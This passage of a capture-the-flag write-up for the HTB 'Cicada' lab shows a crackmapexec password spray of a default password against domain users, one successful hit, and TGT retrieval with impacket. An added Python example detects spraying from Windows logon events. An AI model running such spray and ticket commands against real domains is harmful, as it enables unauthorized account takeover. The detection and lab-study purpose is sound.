Password Spray


A default password was identified in the txt file found in one of the target SMB shares, and 5 valid domain users were enumerated through the RID cycling attack. The default password is sprayed against those users below.

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ crackmapexec smb $IP -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success                                           
SMB         10.129.41.192   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\cicada-dc$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 

The michael.wrightson user has not changed the default password.
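The spray above as a defender would see it in logon events, as an added example that is not part of the original writeup: it groups failed logons (Event ID 4625) by source, flags a source that fails against many distinct accounts in a short window, and lists any account that logged on successfully (Event ID 4624) from that source in the same window. The account names come from the output above; the source IPs, timestamps, thresholds and the `detect_spray` helper are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not captured from the lab):
# (timestamp, event_id, source_ip, account). 4625 = failed logon, 4624 = successful logon.
EVENTS = [
    ("2024-10-01T10:00:01", 4625, "10.10.14.5", "administrator"),
    ("2024-10-01T10:00:01", 4625, "10.10.14.5", "guest"),
    ("2024-10-01T10:00:02", 4625, "10.10.14.5", "cicada-dc$"),
    ("2024-10-01T10:00:02", 4625, "10.10.14.5", "john.smoulder"),
    ("2024-10-01T10:00:03", 4625, "10.10.14.5", "sarah.dantelia"),
    ("2024-10-01T10:00:03", 4624, "10.10.14.5", "michael.wrightson"),
    ("2024-10-01T10:00:04", 4625, "10.10.14.5", "david.orelious"),
    ("2024-10-01T10:00:04", 4625, "10.10.14.5", "emily.oscars"),
    # Ordinary user mistyping a password once from a workstation: must not alert.
    ("2024-10-01T10:02:10", 4625, "10.0.0.23", "emily.oscars"),
    ("2024-10-01T10:02:30", 4624, "10.0.0.23", "emily.oscars"),
]

def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return one alert per source that fails logons for at least `min_accounts`
    distinct accounts within `window`, with accounts that succeeded in that window."""
    by_src = defaultdict(list)
    for ts, event_id, src, account in events:
        by_src[src].append((datetime.fromisoformat(ts), event_id, account.lower()))

    alerts = []
    for src, evs in by_src.items():
        evs.sort()
        fails = [(t, a) for t, e, a in evs if e == 4625]
        for i, (start, _) in enumerate(fails):
            # Distinct accounts that failed inside the window opening at this failure.
            targets = {a for t, a in fails[i:] if t - start <= window}
            if len(targets) >= min_accounts:
                # A success from the same source in the window is a likely valid credential.
                hits = sorted({a for t, e, a in evs
                               if e == 4624 and start <= t <= start + window})
                alerts.append({"source": src, "start": start.isoformat(),
                               "failed_accounts": sorted(targets),
                               "succeeded_accounts": hits})
                break  # one alert per source is enough for triage
    return alerts

if __name__ == "__main__":
    for alert in detect_spray(EVENTS):
        print(alert)
```

Accounts listed under `succeeded_accounts` are the ones to reset first, since the sprayed password worked for them.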

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-getTGT 'CICADA.HTB/michael.wrightson@cicada-dc.cicada.htb' -dc-ip $IP 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: Cicada$M6Corpb*@Lp#nZp!8
[*] Saving ticket in michael.wrightson@cicada-dc.cicada.htb.ccache

Validated. A TGT was generated for the michael.wrightson user.